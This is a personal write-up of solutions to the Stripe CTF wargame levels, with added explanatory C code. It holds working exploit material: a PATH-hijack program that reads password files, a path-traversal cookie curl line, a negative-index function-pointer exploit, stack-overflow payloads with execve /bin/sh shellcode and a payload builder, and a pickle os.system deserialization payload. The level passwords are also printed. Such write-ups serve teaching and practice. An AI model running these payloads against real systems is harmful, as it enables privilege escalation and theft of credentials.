Stripe CTF Challenge - Solutions to all Levels

Stripe CTF - Work Notes
mpetrov (petrov.michael@gmail.com)
 
These notes are very rough. They should give a general idea of how each level was solved.
 
---- LEVEL 01 (login: e9gx26YEb2) -----
Solution: modifying the PATH env variable (the level binary presumably resolves a helper such as `date` through PATH; the date.c below, compiled under that name into a directory placed first in PATH, then runs with the binary's effective uid and can read level02's password)
Password: kxlVXUvzv
 
date.c
#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <sys/types.h>
#include <unistd.h>

/* Dropped in place of the real "date": prints which uid/euid we got, then
 * reads level02's home directory with that effective uid. */
int main(void) {
    printf(
        " UID GID \n"
        "Real %d Real %d \n"
        "Effective %d Effective %d \n",
        getuid (), getgid (),
        geteuid(), getegid()
    );
    system("ls -la /home/level02/");
    system("cat /home/level02/.password");
    return 0; /* always good to return something */
}
 
 
---- LEVEL 02 (login: kxlVXUvzv) -----
Solution: path traversal through the user_details cookie: the page reads the file named by the cookie, so setting it to ../../home/level03/.password makes the page print the next level's password
Password: Or0m4UX07b
 
 
 
 
---- LEVEL 03 (login: Or0m4UX07b) -----
Solution: negative index exploit (a signed index from argv selects an entry of a function-pointer table with no lower-bound check)
Password: i5cBbPvPCpcP

ROUGH NOTES:
- target function (from nm): 0x804875b run
- use gdb to break in truncate_and_call and step through a bit
- get the address of buf and compare it with the address of fns: buf sits 0x70 bytes below fns, so a negative index into fns reaches back into attacker-controlled bytes in buf
- the fns entries are 4-byte pointers; with the fake pointer placed right after "./a.out\n" (8 bytes into buf), the index is (8 - 0x70) / 4 = -26
- run -26 $'./a.out\n\x5b\x87\x04\x08'   (\x5b\x87\x04\x08 is 0x0804875b, the address of run, little-endian; it contains no NUL byte, so it survives being passed as a C string)
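Added example, not the author's exploit or the CTF binary: a C model of the level03 bug that puts the vulnerable dispatcher next to a bounds-checked one and carries out the index arithmetic from the notes. Assumptions made here: the struct `frame` forces the 0x70-byte distance between `buf` and `fns[]` that the notes measured in gdb (in the real binary the compiler chose that layout); `run()`, `harmless()`, `dispatch_vulnerable()`, `dispatch_fixed()` and `exploit_model()` are stand-ins invented for this demo; and the copy into `buf` is length-based rather than a C-string copy, so the demo does not depend on the address being free of NUL bytes.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Model of the level03 bug, not the CTF binary: the struct pins buf exactly
 * 0x70 bytes below the fns[] table (the distance measured in gdb in the
 * notes), so the arithmetic is the same on any host. */
#define BUF_BELOW_FNS 0x70
#define NFNS 4

typedef void (*handler_t)(const char *);

struct frame {
    char buf[BUF_BELOW_FNS];   /* copy of the attacker's string argument */
    handler_t fns[NFNS];       /* legitimate handler table, indexed by argv[1] */
};

static char last_run_cmd[64];

/* Stand-in for the binary's run() (0x804875b): the real one hands its
 * argument to a shell, this one only records the first line for checking. */
static void run(const char *cmd)
{
    size_t n = strcspn(cmd, "\n");
    if (n >= sizeof last_run_cmd) n = sizeof last_run_cmd - 1;
    memcpy(last_run_cmd, cmd, n);
    last_run_cmd[n] = '\0';
}

static void harmless(const char *s) { (void)s; }

/* Signed index that makes fns[idx] alias buf + payload_off.  With the fake
 * pointer placed after "./a.out\n" (offset 8) and 4-byte pointers this is
 * (8 - 0x70) / 4 == -26, the index in the notes' "run -26 ..." line. */
int negative_index(size_t payload_off)
{
    return (int)(((ptrdiff_t)payload_off - BUF_BELOW_FNS) / (ptrdiff_t)sizeof(handler_t));
}

/* Vulnerable dispatcher: copies the string, then calls fns[idx] with no check
 * that idx is inside the table.  The lookup is spelled as byte arithmetic
 * inside the struct so the out-of-table read stays well defined in this
 * model; in the binary it was simply fns[index](buf). */
static void dispatch_vulnerable(struct frame *f, int idx, const void *str, size_t len)
{
    handler_t fp;
    if (len > sizeof f->buf) len = sizeof f->buf;
    memcpy(f->buf, str, len);
    memcpy(&fp, (const char *)f->fns + (ptrdiff_t)idx * (ptrdiff_t)sizeof fp, sizeof fp);
    fp(f->buf);
}

/* Hardened dispatcher: reject any index outside [0, NFNS) before using it. */
static int dispatch_fixed(struct frame *f, int idx, const void *str, size_t len)
{
    if (idx < 0 || idx >= NFNS) return -1;
    if (len > sizeof f->buf) len = sizeof f->buf;
    memcpy(f->buf, str, len);
    f->fns[idx](f->buf);
    return 0;
}

/* Payload "./a.out\n" + raw bytes of &run (on the CTF box: \x5b\x87\x04\x08).
 * Returns 1 if run() was reached, 0 if not, -1 if the index was rejected. */
int exploit_model(int hardened)
{
    struct frame f;
    unsigned char payload[8 + sizeof(handler_t)];
    handler_t target = run;
    int idx = negative_index(8);

    memset(&f, 0, sizeof f);
    for (int i = 0; i < NFNS; i++) f.fns[i] = harmless;   /* run is NOT in the table */
    memcpy(payload, "./a.out\n", 8);
    memcpy(payload + 8, &target, sizeof target);

    last_run_cmd[0] = '\0';
    if (hardened && dispatch_fixed(&f, idx, payload, sizeof payload) < 0)
        return -1;
    if (!hardened)
        dispatch_vulnerable(&f, idx, payload, sizeof payload);
    return strcmp(last_run_cmd, "./a.out") == 0;
}

const char *last_run(void) { return last_run_cmd; }

int main(void)
{
    int r = exploit_model(0);
    printf("vulnerable dispatcher: index %d reached run(\"%s\") -> %d\n",
           negative_index(8), last_run(), r);
    printf("hardened dispatcher: %d (index rejected)\n", exploit_model(1));
    return 0;
}
```

On the 32-bit target the index is (8 - 0x70) / 4 = -26; on a 64-bit host the same layout gives (8 - 0x70) / 8 = -13, which is what `negative_index(8)` returns there. The fix is the signed-range check in `dispatch_fixed`: an index taken from argv must be validated against the table size, lower bound included, before it is used.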
 
 
---- LEVEL 04 (login: i5cBbPvPCpcP) -----
Solution: buffer overflow exploit
Password: fzfDGnSmd317
 
 
ROUGH NOTES:
- stack buffer overflow of the STRING argument
- address of system: 0xf75d23d0 (gdb: x/x system prints "0xf75d23d0 <system>: 0x890cec83"; the 0x890cec83 is the first four bytes of system's code at that address, not the address itself)
- "smashing the stack for fun and profit"
- located the saved return address by brute force: it starts at the 1037th character of the argument
- payload 1, return into system (\xd0\x23\x5d\xf7 = 0xf75d23d0 little-endian) placed after 1036 bytes of padding:
 
$'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xd0\x23\x5d\xf7AAAAAAAAAAAA'
 
- printf("Usage: ./level04 STRING"); the "./level04" string looked like the key (turned out to be irrelevant at the end)
- 0x080485b7: "./level04 STRING"
- gdb: x/x system -> 0xf75d23d0 <system>: 0x890cec83
- found "call *eax" at 0x804847f in the disassembly: usable as the return address, since it jumps to wherever eax points when the function returns (here, the buffer holding the shellcode)
- Shellcode creator: http://www.shell-storm.org/shellcode/files/utility-478.php
- payload 2: shellcode for "./a.out\n" (it execve()s /bin//sh -ccc "./a.out\n") at the start of the buffer, 'A' padding up to the saved return address, then \x7f\x84\x04\x08 = 0x0804847f (the call *eax gadget, little-endian):
// 48 bytes
$'\x60\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x68\x2d\x63\x63\x63\x89\xe1\x52\xeb\x07\x51\x53\x89\xe1\xcd\x80\x61\xe8\xf4\xff\xff\xff\x2e\x2f\x61\x2e\x6f\x75\x74\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x7f\x84\x04\x08AAAAAAAAAAAA'
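Added example, not part of the original notes: a C payload builder for the level04 layout above, plus a cyclic-pattern helper that replaces the notes' brute-force search for the return-address offset (the pattern_create / pattern_offset idea: every 4-byte window of the pattern is unique, so the EIP value gdb reports after the crash identifies its offset directly). Taken from the notes: offset 1036 (the "1037th character"), the gadget address 0x0804847f and the 48-byte shellcode with its trailing newline. Everything else (`cyclic_pattern`, `cyclic_offset`, `build_payload`, `has_nul` and the simulated crash EIP in `main`) is constructed here.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Values from the notes: saved return address at 0-based offset 1036 of the
 * argument, "call *eax" gadget at 0x0804847f, shellcode as generated above. */
#define RET_OFFSET 1036
#define CALL_EAX_GADGET 0x0804847fu

static const unsigned char shellcode[] =
    "\x60\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"
    "\x89\xe3\x52\x68\x2d\x63\x63\x63\x89\xe1\x52\xeb\x07\x51\x53\x89"
    "\xe1\xcd\x80\x61\xe8\xf4\xff\xff\xff./a.out\n";
#define SHELLCODE_LEN (sizeof shellcode - 1)

/* Little-endian pack/unpack, the byte order of \x7f\x84\x04\x08 in the notes. */
void put_le32(unsigned char *dst, uint32_t v)
{
    for (int i = 0; i < 4; i++) dst[i] = (unsigned char)(v >> (8 * i));
}

uint32_t get_le32(const unsigned char *src)
{
    uint32_t v = 0;
    for (int i = 3; i >= 0; i--) v = (v << 8) | src[i];
    return v;
}

/* argv strings end at the first NUL, so a NUL anywhere in the payload
 * truncates it; 0x0804847f and 0xf75d23d0 pass, many addresses would not. */
int has_nul(const unsigned char *p, size_t len)
{
    return memchr(p, 0, len) != NULL;
}

/* Non-repeating pattern "Aa0Aa1Aa2...Ab0..." (3-byte groups) so that any
 * 4 bytes that land in EIP identify their offset in the input. */
size_t cyclic_pattern(unsigned char *out, size_t len)
{
    size_t n = 0;
    for (char a = 'A'; a <= 'Z' && n < len; a++)
        for (char b = 'a'; b <= 'z' && n < len; b++)
            for (char c = '0'; c <= '9' && n < len; c++) {
                unsigned char g[3] = { (unsigned char)a, (unsigned char)b, (unsigned char)c };
                for (int i = 0; i < 3 && n < len; i++) out[n++] = g[i];
            }
    return n;
}

/* Given the EIP value gdb reports after the crash, find where in the
 * pattern those four bytes sat.  Returns -1 if not found. */
long cyclic_offset(const unsigned char *pat, size_t plen, uint32_t eip)
{
    unsigned char needle[4];
    put_le32(needle, eip);
    for (size_t i = 0; i + 4 <= plen; i++)
        if (memcmp(pat + i, needle, 4) == 0) return (long)i;
    return -1;
}

/* [shellcode][pad 'A'][ret -> gadget][trailer 'A'], the layout of payload 2.
 * Returns the total length, or 0 if the shellcode would overlap the saved
 * return address or the buffer is too small. */
size_t build_payload(unsigned char *out, size_t cap, uint32_t ret, size_t trailer)
{
    size_t total = RET_OFFSET + 4 + trailer;
    if (SHELLCODE_LEN > RET_OFFSET || total > cap) return 0;
    memcpy(out, shellcode, SHELLCODE_LEN);
    memset(out + SHELLCODE_LEN, 'A', RET_OFFSET - SHELLCODE_LEN);
    put_le32(out + RET_OFFSET, ret);
    memset(out + RET_OFFSET + 4, 'A', trailer);
    return total;
}

int main(void)
{
    unsigned char pat[2048], payload[2048];
    size_t n = cyclic_pattern(pat, sizeof pat);
    /* Constructed stand-in for the crash: pretend gdb showed EIP equal to the
     * four pattern bytes at offset 1036, which is what the real crash reveals. */
    uint32_t fake_eip = get_le32(pat + RET_OFFSET);
    printf("offset of 0x%08x in pattern: %ld\n", fake_eip, cyclic_offset(pat, n, fake_eip));
    size_t len = build_payload(payload, sizeof payload, CALL_EAX_GADGET, 12);
    printf("payload: %zu bytes, contains NUL: %s\n", len, has_nul(payload, len) ? "yes" : "no");
    return 0;
}
```

Usage: pass the output of `cyclic_pattern` as the STRING argument under gdb, read EIP from the crash, and `cyclic_offset` returns 1036 without the trial-and-error the notes describe. `build_payload` then reproduces payload 2 and `has_nul` confirms it survives argv. The gadget approach still depends on eax holding a pointer to the buffer at the moment of the `ret`; the notes do not say why that held on the target, so verify it in gdb (`info registers eax` at the breakpoint on the function's `ret`) before relying on it.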
 
 
 
---- LEVEL 05 (login: fzfDGnSmd317) -----
Solution: unpickle exploit (the queued job is deserialized with pickle, and a pickle stream can call arbitrary callables)
Password: SF2w8qU1QDj

ROUGH NOTES:
- touch result.txt
- chmod 777 result.txt  (the job presumably runs as level06, which must be able to write here)
- curl localhost:9020 -d $'test; job: cos\nsystem\n(S\'/tmp/tmp.jbvQGmqMNk/a.out\'\ntR.'
  the job field is a raw pickle opcode stream: "cos\nsystem\n" (GLOBAL, pushes os.system), "(" (MARK), "S'...'" (STRING, pushes the path to a.out), "t" (TUPLE, packs the argument), "R" (REDUCE, calls os.system(path)), "." (STOP); unpickling it runs a.out with the worker's privileges
- exploit code (primitive but works):
#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <sys/types.h>
#include <unistd.h>

/* Run by the worker via os.system(): report which uid/euid we got, then
 * copy level06's password into a world-writable file we can read. */
int main(void) {
    printf(
        " UID GID \n"
        "Real %d Real %d \n"
        "Effective %d Effective %d \n",
        getuid (), getgid (),
        geteuid(), getegid()
    );
    system("ls -la /home/level06/ >> /tmp/tmp.jbvQGmqMNk/result.txt");
    system("cat /home/level06/.password >> /tmp/tmp.jbvQGmqMNk/result.txt");
    return 0; /* always good to return something */
}
 
cat result.txt
- SUCCESS!
 
 
---- LEVEL 06 (login: SF2w8qU1QDj) -----
Solution: timing attack on the fork system call
Details: https://gist.github.com/1899389
Password: theflagl0eFTtT5oi0nOTxO5
 
ROUGH NOTES:
- had to ssh through level05 for some reason (later was fixed)
- if stdout and stderr can be blocking then we can time their outputs and find where the wrong characters are
- http://stackoverflow.com/questions/280571/how-to-control-popen-stdin-stdout-stderr-redirection
- http://stackoverflow.com/questions/4057985/disabling-stdout-buffering-of-a-forked-process
- https://bugzilla.redhat.com/attachment.cgi?id=91467

One-liner for level 02: curl --digest -u level02 -b user_details='../../home/level03/.password' http://ctf.stri.pe/level02.php
